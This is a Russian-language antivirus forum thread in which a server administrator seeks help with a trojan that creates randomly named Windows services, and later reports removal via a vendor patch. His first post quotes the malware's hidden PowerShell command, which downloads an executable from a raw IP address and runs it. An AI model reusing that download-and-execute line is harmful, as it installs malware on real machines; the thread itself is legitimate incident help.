Есть ли информация по трояну? Создает службы ABvYIW-zzCyfQ

[AleckK]

Есть ли информация по трояну? Не могу отследить откуда он срабатывает и какой механизм использует. В интернете никакой информации.

Пока замечено только на Windows 2003. Kaspersky Security 10.1 для Windows Server ничего не видит и не отлавливает.

В службах создаются со случайным наборов букв несколько десятков служб типа ABvYIW ..... zzCyfQ. В службе - выполнение скрипта powershell, в 2003 конечно же он не срабатывает из-за отсутствия powershell.

cmd /c powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX (New-Object Net.WebClient).DownloadFile('http://91.211.88.100/nw.exe,C:\Users\Public\nw.exe');Start-ProcessC:\Users\Public\nw.exe

Хотел сам скачать этот файл и его проверить антивирусом, но сайт не отвечает, файл недоступен. Понимаю, что в будущем ничто не мешает этому файлу появиться.

[kmscom]

внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».

https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url]

[AleckK]

Спасибо. Начал выполнять по инструкции и сразу обнаружил в памяти троян, который все это создает. Нашел описание по этому трояну, что необходимо обновить версии продуктов до самых последних (у меня предпоследнии версии). Проблема решена.

[regist]

@AleckK, сделайте и всё остальное, чтобы убедиться что до конца удалился. Могли остаться куски от этого трояна

[AleckK]

Windows Security 10.0 и 10.1.1 for Windows Server не обнаруживают вирус. Не предотвращает заражение и не видит его даже при запуске вручную сканирования памяти. KVRT находит trojan.multi.genautorunreg.c и удаляет его, но через некоторое время сервер опять заражается.

 

Автоматический сбор логов пока не могу сделать, он пишет, что будет перезагрузка.

Изменено 21 марта, 2019 пользователем AleckK

[Sandor]

Для 64-битной версии системы перезагрузки не будет.

[AleckK]

32-битная Windows Server 2003.

 

3 сервера под 2003 и 1 сервер под 2008 R2 - не защищает касперский.

[AleckK]

Смешно конечно, но это сервера, на них работают удаленно. Даже с ключем mstsc /admin скрипт не запускается. Запустить чиста с консоли на этих серверах невозможно, они за сотни километров, местного админа там нет. Буду писать официальный запрос в техподдержку.

Пусть решают. Это смешно уже. Бесплатная утилита видит вирус, а антивирус, специально созданный для сервера не видит! Отлично мы покупаем ПО.

Изменено 21 марта, 2019 пользователем AleckK

[Дмитрий Петренко]

Сообщение от модератора kmscom

нарушение «Общие правила раздела "Уничтожение вирусов"».

Изменено 4 апреля, 2019 пользователем kmscom

[AleckK]

Да. Выслали патч, который, я так понимаю, еще не вышел в официальное обновление. С этим патчем антивирус видит трояна и лечит.

critical_fix_core_3(14909).zip [16.67 MB]

Изменено 3 апреля, 2019 пользователем AleckK